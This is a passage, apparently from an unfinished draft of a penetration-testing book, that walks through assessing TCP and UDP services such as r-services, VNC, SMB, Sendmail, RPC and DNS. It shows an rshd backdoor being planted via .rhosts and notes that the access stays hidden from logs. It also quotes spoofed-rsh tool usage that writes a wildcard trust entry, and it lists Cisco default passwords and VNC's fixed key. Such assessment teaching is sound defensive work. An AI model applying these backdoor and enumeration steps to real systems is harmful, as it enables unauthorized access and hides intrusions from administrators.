[wu-ftpd-2.6.1-6_imnx_2.rpm] 8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1- 8.6mdk.i586.rpm] 9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm] 10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm] 11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm] 12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm] 13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm] 14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm] 15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm] 16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm] 17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm] 18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm] 19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm] 20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm] 21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm] 22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm] 23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm] 24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm] 25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm] 26 | SuSE 7.0 [wuftpd.rpm] 27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm] 28 | SuSE 7.1 [wuftpd.rpm] 29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm] 30 | SuSE 7.2 [wuftpd.rpm] 31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm] 32 | SuSE 7.3 [wuftpd.rpm] 33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm] 34 | Slackware 7.1 The tool can be easily run with the -a flag, which allows 7350wurm to grab the banner of the target FTP server and select the correct target memory addresses and padding values from its target list. ProFTPD Vulnerabilities 1.2.4 1.2.5 SSH The current version of SSH that a target host is running can be ascertained by simply using telnet to connect to TCP port 22 of the host, as shown below: # telnet 192.168.0.80 22 Trying 192.168.0.80... Connected to 192.168.0.80. Escape character is '^]'. SSH-2.0-OpenSSH_3.5p1 In this example the host is running OpenSSH 3.5 patch level 1 using the SSH 2.0 protocol. Hosts found running the old SSH 1.0 protocol are rare on the Internet at the time of writing, as the SSH 2.0 protocol introduces many useful security features. Security conscious administrators will often modify the SSH banner to present the following information: # telnet 192.168.0.80 22 Trying 192.168.0.80... Connected to 192.168.0.80. Escape character is '^]'. SSH-2.0-0.0.0 In this second example the SSH service supports the SSH 2.0 protocol, but the actual type and version of the service itself is unknown (as it is set to 0.0.0). To properly interact with SSH and log in, we require an SSH client. SSH clients can be found under most recent Unix-based platforms, and OpenSSH (www.openssh.org) is a popular package containing both the SSH server and client utilities for key pair generation and connection to SSH services. For Windows users, PuTTY is a freely downloadable tool available with a host of other SSH client utilities (including PSCP, PSFTP and Plink) available from http://www.chiark.greenend.org.uk/~sgtatham/putty/. Commercial SSH Vulnerabilities OpenSSH Vulnerabilities Ssh 1 CRC bug channel_lookup challenge response / PAM Telnet Common Telnet Banner List Sun Solaris 8: SunOS 5.8 Sun Solaris 2.6: SunOS 5.6 Sun Solaris 2.4 and 2.5.1: UNIX(r) System V Release 4.0 (hostname) SunOS 4.1.x SunOS UNIX (hostname) FreeBSD: FreeBSD/i386 (hostname) (ttyp1) NetBSD: NetBSD/i386 (hostname) (ttyp1) OpenBSD: OpenBSD/i386 (hostname) (ttyp1) Red Hat Linux 8.0 Red Hat Linux release 8.0 (Psyche) Debian Linux 3.0 Debian GNU/Linux 3.0 / hostname SGI IRIX 6.x IRIX (hostname) IBM AIX 4.1.x: AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994. IBM AIX 4.2.x and 4.3.x AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996. Nokia IPSO: IPSO (hostname) (ttyp0) Cisco IOS: User Access Verification Password: Livingstone ComOS: ComOS - Livingston PortMaster Sun Telnet Vulnerabilities Loginex overflow affecting Solaris 6 - 8 BSD Telnet Vulnerabilities Bsd overflow Linux Telnet Vulnerabilities Netkit telnetd remote IRIX Telnet Vulnerabilities Ld_so preload or whatever it was.. AIX Telnet Vulnerabilities Bsd overflow Appliance Server, Router & Switch Telnet Vulnerabilities Ipso user enumeration: pipex-gw>telnet 192.168.0.254 Trying 192.168.0.254 ... Open IPSO (checkpointcharlie) (ttyp0) login: root Password: Login incorrect login: blaaah Password: Login incorrect login: fw1adm Password: Password: Login incorrect login: fw1adm Password: Password: Login incorrect Login timed out after 300 seconds [Connection to 192.168.0.254 closed by foreign host] pipex-gw> Cisco default passes, enable, system, cisco, router, admin, Cisco, !cisco R Services Unix r services are common to commercial Unix-based platforms in particular, including Solaris, HP-UX and AIX. These services are listed in the services file as: exec 512/tcp login 513/tcp shell 514/tcp Each of these services run using standard PAM username and password authentication, which is in turn overridden by ~/.rhosts and /etc/hosts.equiv file entries. Within Unix, the exec service is rexecd, the login service is rlogind, and the shell service is rshd. Accessing r services From a Unix platform, rsh, rlogin and rexec clients are used to access the respective r services running on a remote host. Figure 31 below shows the usage for each client when run from the Unix command shell. Figure 31: Running rsh, rlogin and rexec from the command shell # rsh usage: rsh [-nd] [-l login] host [command] # rlogin usage: rlogin [ -8EL] [-e char] [ -l username ] host # rexec rexec: Require at least a host name and command. Usage: rexec [ -abcdhns ] -l username -p password host command -l username: Sets the login name for the remote host. -p password: Sets the password for the remote host. -n: Explicitly prompt for name and password. -a: Do not set up an auxiliary channel for standard error. -b: Use BSD-rsh type signal handling. -c: Do not close remote standard in when local input closes -d: Turn on debugging information. -h: Print this usage message. -s: Do not echo signals to the remote process. Unix ~/.rhosts and /etc/hosts.equiv files The .rhosts file exists in the user home directory under Unix, containing a list of username and IP address or machine hostname pairs, such as the following: # pwd /home/chris # cat .rhosts chris mail.trustmatta.com + 192.168.0.55 # In this example, I can use any of the r services (rsh, rlogin or rexec) to connect to this host from mail.trustmatta.com if I am logged into the host as chris, or from 192.168.0.55 with any username on that host. When a user connects to the host running rshd (the remote shell daemon running on TCP port 514), the source IP address is cross-referenced against the .rhosts file and verified by querying the identd service running at the source. If these details are found to be valid, then direct access is given to the host without even requiring a password. A simple yet effective backdoor for most Unix-based systems running rshd is to place an .rhosts file in the home directory of the bin user (/usr/bin/ under Solaris) containing the wildcard '+ +' for any user at any host. Figure 32 below demonstrates this backdoor being planted and used to gain access to the host: Figure 32: Planting and accessing a simple .rhosts rshd backdoor # echo + + > /usr/bin/.rhosts # exit hacker@host/$ rsh -l bin 192.168.0.20 csh -i Warning: no access to tty; thus no job control in this shell... www% w 5:45pm up 33 day(s), 15 min(s), 1 user, load average: 0.00, 0.00, 0.01 User tty login@ idle JCPU PCPU what root console 19Dec0219days -sh www% A useful feature with the rshd service is that terminals are not assigned to processes run through rsh. This means that bin access through our rshd backdoor does not appear in the utmp or wtmp logs, and is cloaked within the system (not appearing within w or who listings). Unfortunately, the network connection into TCP port 514 will appear if a user executes a netstat -a command, and processes run by the bin user will also appear in ps -ef listings. It is very easy to get from bin to root under Unix-based systems, as the bin user owns many binaries that run as system services (found under directories including /usr/sbin/) with super-user root privileges. The /etc/hosts.equiv file is a system level file used to define trusted hostnames or IP addresses that can freely access r services. SunOS 4.1.3_U1 shipped with a '+' wildcard in the /etc/hosts.equiv file, allowing for attackers to gain direct bin level access to SunOS 4.1.3_U1 servers with TCP port 514 open. Testing the security of r services User passwords can be brute forced across rlogind, as the service calls /bin/login and the standard PAM mechanism. The rshd and rexecd services do not pass username and password details to the login program in this way, and merely rely on .rhosts and /etc/hosts.equiv entries for authentication. It is recommended that for each user enumerated through finger, SMTP and other information leak vulnerabilities, attempts are made to access the host directly through open r services in the following fashion: # rsh -l chris 192.168.0.20 csh -i permission denied # rsh -l test 192.168.0.20 csh -i permission denied # rsh -l root 192.168.0.20 csh -i permission denied # rsh -l bin 192.168.0.20 csh -i Warning: no access to tty; thus no job control in this shell... www% It will be possible to use rsh to log into a Solaris server as root if the user's password has not been set. I have seen this only once in a live environment, during an onsite audit I undertook in a hosting centre containing Solaris web servers that had been built and configured using automatic scripts. Spoofing connections to the rsh service If you are aware of trust between hosts or have seen .rhosts files on compromised servers, tools can be used to spoof rsh connections by using IP sequence prediction and falsified client responses to match entries in .rhosts files server-side. A good tool used to perform such rsh spoofing is ADMrsh, available from the ADM website at adm.freelsd.net/ADM/. The utility requires the latest version of ADMspoof and its header files (found in ADM- spoof-NEW.tgz at the time of writing), and its usage is shown below: ADMrsh **==** It's very easy to use (like all the ADM products). ADMrsh [ips] [ipd] [ipl] [luser] [ruser] [cmd] Parameters List : ips = ip source (ip of the trusted host) ipd = ip destination (ip of the victim) ipl = ip local (your ip to receive the informations) luser = local user ruser = remote user cmd = command to execute If ya don't understand, this is an example : ADMrsh a.foo.us b.foo.us ppp.bad.org root root "echo\"+ +\">/.rhosts" Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet ADMrsh 0.5 pub (c) ADM <-- hehe ;) X Windows Tcp 6000 Microsoft Remote Desktop Protocol Remote Desktop Protocol (RDP) is used as a terminal service for thin client access to the Windows desktop across a network. The service can be found running on TCP port 3389, and the Microsoft terminal services (or Remote Desktop within Windows XP) client is used to connect to the RDP service, as shown in figure xx. Figure xx: Connecting to RDP using the remote desktop client VNC AT&T's Virtual Network Computing (VNC) package is available from www.uk.research.att.com/vnc/. VNC is a free and simple to deploy remote desktop access system for Windows systems, and can be found running over the following TCP ports: Port 5800 for HTTP access to VNC using a Java client through a web browser Port 5900 for direct access to VNC using the native vncviewer.exe From a security perspective VNC is relatively straightforward to compromise. The main problem with VNC security is in the authentication phase when a user connects to the service, below is a screenshot from vncviewer.exe: [pic] VNC only requires one piece of data for authentication purposes, a session password (which has a maximum length of 8 characters). On the target server, the VNC password string is stored in the Windows registry under the following keys: \HKEY_CURRENT_USER\Software\ORL\WinVNC3 \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3 A fixed key is used to encrypt the VNC password using DES, and so if we can gain read access to the registry across the network (often accessible on poorly protected Windows hosts), it is possible to compromise the VNC session password. The current fixed key can be retrieved from the VNC source code, available from the AT&T site. At the time of writing the fixed key found in VNC is 23 82 10 76 35 78 88 7. VNCrack VNCrack by FX of Phenoelit is a Unix-based VNC hacking utility available from www.phenoelit.de/vncrack/. VNCrack is capable of performing the following attacks against VNC servers: Cracking of the Windows registry hex values to compromise the session password Direct brute force of the VNC session password The VNC handshake can be sniffed and the session password compromised using the Unix-based PHoss network sniffing utility, available from Phenoelit at www.phenoelit.de/phoss/. PCAnywhere PCAnywhere listens on ports 22 (TCP and UDP), 5631 (TCP) "pcanywheredata", and 5632 (TCP and UDP) "pcanywherestat), and 65301 (TCP). Citrix Citrix is a scalable thin client Windows service that is accessed directly through TCP port 1494 and high dynamic ports (above 1024) server-side. The protocol that Citrix uses is known as ICA (Independent Computing Architecture), and upon locating a server with TCP port 1494 open, a Citrix ICA client should be selected and used to connect to the service for further investigation (available from www.citrix.com/download/ica_clients.asp). ControlIT TCP port 799 Various vulnerabilities found in 1999 by ISS Microsoft Windows Networking TCP Services Microsoft Windows networking services involve use of the following TCP services server-side: 135 139 445 UDP ports 137 and 138 are used primarily within Windows domains and networks to facilitate name lookup and other functions, which are discussed in the next chapter. client / server communication 135 common internet file system 139 & 445 file sharing session 139 login sequence 139 UDP ports 137 and 138 are used for various NetBIOS naming lookup functions, which are covered in the following Chapter. The SMB (Server Message Block) protocol is used among other things for file sharing in Windows NT / 2000. In Windows NT it ran on top of NBT (NetBIOS over TCP/IP), which used the famous ports 137, 138 (UDP) and 139 (TCP). In Windows 2000, Microsoft added the possibility to run SMB directly over TCP/IP, without the extra layer of NBT. For this they use TCP port 445. Microsoft DCE Locator Service running on port 135 Microsoft DCE Locator service aka. end-point mapper. It works like Sun RPC portmapper, except that end-points can also be named pipes. Microsoft relies upon DCE RPC to remotely manage services. Some services that use port 135 of end-point mapping include DNS, WINS, Exchange and the Messenger Service. Enumerate system information through the DCE Locator Service Through the DCE locator service we can primarily enumerate the following: IP addresses used on other network interfaces Details of services using dynamic high ports EPDUMP Epdump is a Windows command-line utility that can be used to query the DCE locator service running on TCP port 135 of the target host in the following manner: D:\>epdump binding is nil int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncadg_ip_udp:192.168.0.1[1028] annot 'Messenger Service' int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 binding 00000000-0000-0000-0000- 000000000000@ncalrpc:[LRPC00000284.00000001] annot '' int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:62.30.68.4[1025] annot '' int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:192.168.170.1[1025] annot '' int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:192.168.189.1[1025] annot '' int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:192.168.0.1[1025] annot '' int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 binding 00000000-0000-0000-0000- 000000000000@ncalrpc:[LRPC00000284.00000001] annot '' int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:62.30.68.4[1025] annot '' int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:192.168.170.1[1025] annot '' int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:192.168.189.1[1025] annot '' int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_ip_tcp:192.168.0.1[1025] annot '' int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncalrpc:[ntsvcs] annot 'Messenger Service' int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_np:\\\\OSG-SERV[\\PIPE\\nt svcs] annot 'Messenger Service' int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncacn_np:\\\\OSG-SERV[\\PIPE\\sc erpc] annot 'Messenger Service' int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncalrpc:[DNSResolver] annot 'Messenger Service' int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncadg_ip_udp:62.30.68.4[1028] annot 'Messenger Service' int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncadg_ip_udp:192.168.170.1[1028] annot 'Messenger Service' int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 binding 00000000-0000-0000-0000- 000000000000@ncadg_ip_udp:192.168.189.1[1028] annot 'Messenger Service' no more entries D:\> DCETEST Dave Aitel wrote a simple yet effective Unix version of the epdump utility, called dcetest. The dcetest tool is run in a similar fashion, with similar results: Brute force of user passwords through the DCE Locator Service WMIcracker.exe uses TCP 135 to access the WMI and brute force passwords of users in the administrators group Remotely running arbitrary code or crashing the DCE Locator Service Two particular vulnerabilities were disclosed in late 2002 regarding the DCE locator service and flaws within the program that can lead to arbitrary code being run or the service crashing. The bug is present in Windows NT 4.0 through to XP. In particular, two articles are of interest: http://www.mail-archive.com/bugtraq@securityfocus.com/msg09495.html http://www.microsoft.com/technet/security/bulletin/MS03-001.asp Microsoft NetBIOS Session Service running on port 139 NetBIOS Session (TCP), Windows File and Printer Sharing Enumeration through the NetBIOS session service Various tools can be used to enumerate a lot of sensitive information from a target Windows workstation or server with TCP port 139 open. Information can be gleaned either anonymously by setting up what is known as a null session, or through knowledge of a valid username and password. By default, Windows NT and 2000 hosts do not prohibit anonymous access to information through NetBIOS, and so the following can be gleaned: User list Machine list NetBIOS name list Share list Password policy information Group and member list Local Security Authority policy information Trust information between domains and hosts NIC IP and MAC addresses Three tools in particular are very good at enumerating this information Enum.exe Dumpsec.exe, dumpsec /computer=IPaddress /rpt=users /saveas=tsv /outfile=users.txt Winfo.exe Brute force of user passwords through the NetBIOS session service SMBcrack.exe uses TCP 139 and crafts SMB packets net use * \\target\share passwd/user:domain\username VPN & Remote Network Access Services IPsec VPN tunnels and services do not even use standard IP, and are therefore lie outside of the scope of this book. However, vendors such as Checkpoint use IP for VPN communication, which is often more widely supported. IP-based VPN and remote network access services are as follows: FW1-secureremote 256/tcp # also "rap" FW1-mc-fwmodule 257/tcp # FW1 management console for communication w/module Fw1-mc-gui 258/tcp # also yak winsock personal chat FW1-or-bgmp 264/udp # FW1 secureremote alternate isakmp 500/tcp # ISAKMP Checkpoint VPN 256 (TCP) Certificate/key distribution. VPN clients (SecuRemote) can download keys on this port. 257 (TCP) logging 258 (TCP) Remote control over policy editing. 259? Microsoft PPTP Point to Point Tunneling Protocol - tcp/1723 ISAKMP Internet Security Association and Key Management Protocol (ISAKMP) This port is available on most systems that support IPsec. Many IPsec- compatible VPN providers use this port, such as Nortel/Bay Networks Extranet Access Client. Tcp and udp 500 Ike-scan by nta monitor Queries isakmp and works out vpn gateway type from responses Network Proxy Services Squid 3128 Socks 1080 Web 8080 It is possible to port scan through socks et al E-Mail & News Services Services used for e-mail and news delivery listed from the services file are as follows: smtp 25/tcp pop2 109/tcp pop3 110/tcp nntp 119/tcp imap2 143/tcp Sendmail Most Unix-based systems run Sendmail, including Linux, Solaris, OpenBSD and others. Sendmail is particularly vulnerable to two specific types of attack: Information leak vulnerabilities Process manipulation vulnerabilities Sendmail Information Leak Vulnerabilities If the Sendmail banner is obfuscated or modified, the true version of Sendmail can usually be ascertained by issuing a HELP request (Sun Sendmail 8.9.3 in this case): # telnet mx4.sun.com 25 Trying 192.18.42.14... Connected to nwkea-mail-2.sun.com. Escape character is '^]'. 220 nwkea-mail-2.sun.com ESMTP Sendmail ready at Tue, 7 Jan 2003 02:25:20 -0800 (PST) HELO world 250 nwkea-mail-2.sun.com Hello no-dns-yet.demon.co.uk [62.49.20.20] (may be forged), pleased to meet you HELP 214-This is Sendmail version 8.9.3+Sun 214-Commands: 214- HELO MAIL RCPT DATA RSET 214- NOOP QUIT HELP VRFY EXPN 214-For more info use "HELP ". 214-smtp 214-To report bugs in the implementation contact Sun Microsystems 214-Technical Support. 214-For local information contact postmaster at this site. 214 End of HELP info Valid user account details can be enumerated using one of three techniques: EXPN username VRFY username RCPT TO:username EXPN The Sendmail EXPN command is historically used to expand details about a given SMTP e-mail address. Detailed in figure xx below, we can ascertain the following: The test user account does not exist locally on the server E-mail for root is infact sent to chris.mcnab@trustmatta.com The sshd user account exists locally with the real name of sshd privsep Figure xx: Using EXPN to enumerate user details # telnet 10.0.10.11 25 Trying 10.0.10.11... Connected to 10.0.10.11. Escape character is '^]'. 220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 -0700 (MST) HELO world 250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet you EXPN test 550 5.1.1 test... User unknown EXPN root 250 2.1.5 EXPN sshd 250 2.1.5 sshd privsep VRFY The Sendmail VRFY command is historically used to verify that a given SMTP e-mail address is valid. We can abuse this feature to enumerate valid local user accounts, as detailed in figure xx below. Figure xx: Using VRFY to enumerate user accounts # telnet 10.0.10.11 25 Trying 10.0.10.11... Connected to 10.0.10.11. Escape character is '^]'. 220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 -0700 (MST) HELO world 250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet you VRFY test 550 5.1.1 test... User unknown VRFY chris 250 2.1.5 Chris McNab RCPT TO: I have found this technique to be extremely effective at enumerating active user accounts on even the most secure hosts. Many security conscious network administrators ensure that EXPN and VRFY commands are not accessible, but the RCPT TO: enumeration bug takes advantage of a vulnerability deep within the Sendmail program, one that is not easily removed without modification of source code. Figure xx: Executing the RCPT TO: user enumeration attack # telnet 10.0.10.11 25 Trying 10.0.10.11... Connected to 10.0.10.11. Escape character is '^]'. 220 mail2 ESMTP Sendmail 8.12.6/8.12.5 ready at Wed, 8 Jan 2003 03:19:58 -0700 (MST) HELO world 250 mail2 Hello onyx [192.168.0.252] (may be forged), pleased to meet you MAIL FROM:test@test.org 250 2.1.0 test@test.org... Sender ok RCPT TO:test 550 5.1.1 test... User unknown RCPT TO:admin 550 5.1.1 admin... User unknown RCPT TO:chris 250 2.1.5 chris... Recipient ok Even Sendmail services protected by a firewall SMTP proxy (such as that found on the Watchguard Firebox) are vulnerable to the RCPT TO: attack, though suspicious commands such as EXPN, VRFY and HELP are filtered, as shown below in figure xx. Figure xx: Enumerating local users with Sendmail behind a firewall # telnet 10.0.10.10 25 Trying 10.0.10.10... Connected to 10.0.10.10. Escape character is '^]'. 220 ************************0*0*0*0*0*0*******2******2002********0 *** HELO world 250 mailserv.trustmatta.com Hello onyx [192.168.0.252], pleased to meet you EXPN test 500 5.5.1 Command unrecognized: "XXXX test" VRFY test 500 5.5.1 Command unrecognized: "XXXX test" HELP 500 5.5.1 Command unrecognized: "XXXX" MAIL FROM:test@test.org 250 2.1.0 test@test.org... Sender ok RCPT TO:test 550 5.1.1 test... User unknown RCPT TO:chris 250 2.1.5 chris... Recipient ok RCPT TO:nick 250 2.1.5 nick... Recipient ok Sendmail Process Manipulation Vulnerabilities The following remotely exploitable process manipulation vulnerabilities exist in Sendmail: Sendmail 8.8.3 and 8.8.4 MIME conversion buffer overflow (CVE-1999-0057) http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=sendmail MS Exchange ESMTP Qpopper MS Exchange POP3 Web Services HTTP and HTTPS services can be assessed using the following: Whisker N-Stealth Netcraft.com HEAD / HTTP/1.0 OPTIONS / HTTP/1.0 Microsoft IIS Global.asa ISAPI filters IDA, IDQ, IDC, HTR, HTW, PRINTER Apache Netscape enterprise OpenSSL Proxy Services Squid - 3128 Socks - 1080 8080 HTTP CONNECT proxy on port 80 Database Services Services that can be used by systems administrators or server operators to directly access 1521 / 1524 (oracle), 1433, 3307 ?? (mysql), postgres.. etc. sybase 2638/tcp # Sybase database 66 (TCP/UDP) Early assignment for Oracle SQL*NET 118 (TCP/UDP) sqlserv 150 (TCP/UDP) SQL-NET 156 (TCP/UDP) sqlsrv 1114 (TCP/UDP) mini-SQL 1433 (TCP/UDP) Microsoft SQL Server 1434 (TCP/UDP) Microsoft SQL Monitor 1498 (TCP/UDP) Sybase SQL AnyWhere 1521 (TCP) Oracle SQL*Net v2 1522 (TCP) Oracle 1525 (TCP) Oracle SQL*Net v1 1529 (TCP) Oracle SQL*Net 1978 (TCP/UDP) UniSQL 1979 (TCP) UniSQL Java 3306 (TCP/UDP) mySQL 3352 (TCP/UDP) SSQL 4333 (TCP) mSQL Unix RPC Services A number of interesting Unix services (including NIS+ and NFS) are RPC services. RPC stands for Remote Procedure Call, and RPC services often run on dynamically assigned high ports. To track and present clients with accurate service details, an RPC portmapper service listens on TCP (and sometimes UDP) port 111. The portmapper service can be queried using the rpcinfo command found on most Unix-based platforms: # rpcinfo -p 192.168.0.50 program vers proto port service 100000 4 tcp 111 rpcbind 100000 4 udp 111 rpcbind 100024 1 udp 32772 status 100024 1 tcp 32771 status 100021 4 udp 4045 nlockmgr 100021 2 tcp 4045 nlockmgr 100005 1 udp 32781 mountd 100005 1 tcp 32776 mountd 100003 2 udp 2049 nfs 100011 1 udp 32822 rquotad 100002 2 udp 32823 rusersd 100002 3 tcp 33180 rusersd In this case, the Solaris server at hand is running the following RPC services: Status (also known as rpc.statd) on TCP port 32771 and UDP port 32772 Nlockmgr (also known as rpc.lockd) on TCP and UDP port 4045 NFS on UDP port 2049 Rquotad on UDP port 32822 Rusersd on TCP port 33180 and UDP port 32823 These services can then be accessed and queried directly, using client software such as showmount and mount (for accessing NFS and its status, lockd & rquotad components), and rusers as discussed earlier in this chapter. A list of popular RPC services along with their respective prognum values is as follows (taken from the Unix /etc/rpc file): portmapper 100000 portmap sunrpc rstatd 100001 rstat rstat_svc rup perfmeter rusersd 100002 rusers nfs 100003 nfsprog ypserv 100004 ypprog mountd 100005 mount showmount ypbind 100007 walld 100008 rwall shutdown yppasswdd 100009 yppasswd etherstatd 100010 etherstat rquotad 100011 rquotaprog quota rquota sprayd 100012 spray 3270_mapper 100013 rje_mapper 100014 selection_svc 100015 selnsvc database_svc 100016 rexd 100017 rex alis 100018 sched 100019 llockmgr 100020 nlockmgr 100021 x25.inr 100022 statmon 100023 status 100024 bootparam 100026 ypupdated 100028 ypupdate keyserv 100029 keyserver tfsd 100037 nsed 100038 nsemntd 100039 ypxfrd 100069 pcnfsd 150001 amd 300019 amq sgi_fam 391002 Identifying RPC Services Without the Portmapper In networks protected by firewalls and other mechanisms, it is not uncommon for access to the RPC portmapper service running on port 111 to be filtered. Determined attackers will often scan high port ranges (usually between 32000 and 33000) looking for RPC services listening on high ports, and then attempt to compromise these RPC services. A list of common RPC service ports and their respective daemons under the Sun Microsystems Solaris operating platform is as follows (taken from nmap- services): sometimes-rpc5 32771/tcp # Sometimes rusersd sometimes-rpc6 32771/udp # Sometimes rusersd sometimes-rpc7 32772/tcp # Sometimes status sometimes-rpc8 32772/udp # Sometimes status sometimes-rpc9 32773/tcp # Sometimes rquotad sometimes-rpc10 32773/udp # Sometimes rquotad sometimes-rpc11 32774/tcp # Sometimes rusersd sometimes-rpc12 32774/udp # Sometimes rusersd sometimes-rpc13 32775/tcp # Sometimes status sometimes-rpc14 32775/udp # Sometimes status sometimes-rpc15 32776/tcp # Sometimes sprayd sometimes-rpc16 32776/udp # Sometimes sprayd sometimes-rpc17 32777/tcp # Sometimes walld sometimes-rpc18 32777/udp # Sometimes walld sometimes-rpc19 32778/tcp # Sometimes rstatd sometimes-rpc20 32778/udp # Sometimes rstatd sometimes-rpc25 32786/tcp # Sometimes mountd sometimes-rpc27 32787/tcp # Sometimes dmispd (DMI Service Provider) RPC Services of Interest Rexd On host command Rstatd Rusers Rusers -l host Nfs Showmount -e host Nis Walld Sprayd Nlockmgr & status Ypbind & ypupdated Network Printing Services Primarily when assessing internal networks, printers and other devices which using IP can be found. In particular, HP printers are commonly found with specific TCP ports open. A listing of common network printing services includes: 9100 HP management hp-fun.c by sil 515 LPD ----[ 2.1 Chapter 6, Assessing UDP Network Services Assessing UDP Network Services This chapter focuses on the steps taken to properly test accessible UDP network services during a network security assessment exercise. UDP services are often accessible on poorly configured or protected hosts; with vulnerable services that can be abused to glean network information, or to compromise network devices directly through process manipulation and buffer overflow attacks. In particular, the assessment five key UDP services is covered in this chapter: DNS, listening on port 53 SNMP, listening on port 161 TFTP, listening on port 69 DHCP, listening on ports 67 and 68 Rwhod, listening on port 513 DNS The DNS service uses two ports to fulfill requests; UDP port 53 to serve standard direct requests (to resolve names to IP addresses and vice versa), and TCP port 53 to serve DNS zone information during a DNS zone transfer. This following section relates entirely to the assessment and probing of DNS over UDP. Retrieving DNS Version Information DNS server version information can be gleaned directly across UDP port 53 by issuing a version.bind chaos txt request through the Unix dig utility as shown in figure xx. In our example against mail.hmgcc.gov.uk, we find that BIND 9.2.1 is running. Figure xx: Using dig to retrieve BIND version information # dig @mail.hmgcc.gov.uk version.bind chaos txt ; <<>> DiG 9.2.0 <<>> @mail.hmgcc.gov.uk version.bind chaos txt ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21612 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;version.bind. CH TXT ;; ANSWER SECTION: version.bind. 0 CH TXT "9.2.1" ;; Query time: 29 msec ;; SERVER: 195.217.192.1#53(mail.hmgcc.gov.uk) ;; MSG SIZE rcvd: 48 If you do not have access to the dig utility, nslookup can be used in an interactive fashion from Windows, Unix or MacOS to perform the same version.bind request, as shown in figure xx. In this second example we find that relay2.ucia.gov is running BIND 4.9.11, one of the latest versions of the BIND 4 DNS server software. Figure xx: Using nslookup to retrieve BIND version information # nslookup > server relay2.ucia.gov Default server: relay2.ucia.gov Address: 198.81.129.194#53 > set class=chaos > set type=txt > version.bind Server: relay2.ucia.gov Address: 198.81.129.194#53 VERSION.BIND text = "4.9.11-REL" BIND Vulnerabilities The Berkeley Internet Name Daemon is run on most Unix name servers. BIND has been found to be vulnerable to a plethora of buffer overflow and denial of service attacks over recent years, and the Internet Software Consortium has created a very useful HTML page to track all publicly known vulnerabilities in BIND, accessible at www.isc.org/products/BIND/bind- security.html. At the bottom of the ISC page is an excellent matrix documenting exactly which versions of BIND are vulnerable to each known attack. What follows is a summary of remotely exploitable vulnerabilities within BIND to date, with details of the affected versions of software. Remote Execution of Code Vulnerabilities in BIND SIG overflow, affecting BIND 4.9.5 - 4.9.10, 8.1, 8.2 - 8.2.6 and 8.3.0 - 8.3.3 NXDOMAIN overflow, affecting BIND 8.2 - 8.2.6 and 8.3.0 